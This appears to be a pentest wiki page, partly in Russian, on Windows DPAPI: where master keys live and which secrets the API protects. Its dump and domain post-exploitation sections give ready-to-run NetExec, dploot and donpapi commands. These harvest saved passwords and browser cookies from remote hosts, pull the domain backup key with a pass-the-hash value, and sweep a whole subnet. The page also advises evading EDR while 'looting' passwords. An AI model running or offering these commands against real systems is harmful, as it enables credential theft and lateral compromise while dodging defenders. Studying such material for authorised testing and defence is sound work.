DPAPI

Data Protection API

Master keys

Пользовательский мастер-ключ хранится в профиле пользователя по следующему пути: Users\%USER%\AppData\Roaming\Microsoft\Protect\%SID%\

Системные мастер-ключи хранятся по следующему пути: windows\system32\Microsoft\Protect\S-1-5-18\

Аналогично с пользователем – используется один мастер-ключ, имя которого можно найти в файле Preferred, где хранятся все когда-либо используемые ключи.

What Stored

DPAPI используется для шифрования закрытых ключей клиентских и системных сертификатов, WIFI ключей, Chrome (cookie, паролей), DropBox, Skype, RSA SecurID (софтварного приложения, которое генерирует одноразовые ключи) etc.

Dump

You can dump DPAPI credentials using NetExec using the following option --dpapi. It will get all secrets from Credential Manager, Chrome, Edge, Firefox. --dpapi support options :

cookies : Collect every cookies in browsers
nosystem : Won't collect system credentials. This will prevent EDR from stopping you from looting passwords

You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account

nxc smb <ip> -u user -p password --dpapi
nxc smb <ip> -u user -p password --dpapi cookies
nxc smb <ip> -u user -p password --dpapi nosystem

Domain postexploit

Dump backup domain keys for decrypt secrets dpapi:

dploot backupkey -u admin -hashes 86c65f3b745340e768249e4ff2732c32 -t dc-01.example.cpm

shoot donpapi with opsec flag

donpapi collect -d example.com -k -t 10.0.1.0/24 --no-remoteops --pvkfile ~/key.pvk

PreviousSAM & LSA secrets NextLSASS

Last updated 5 months ago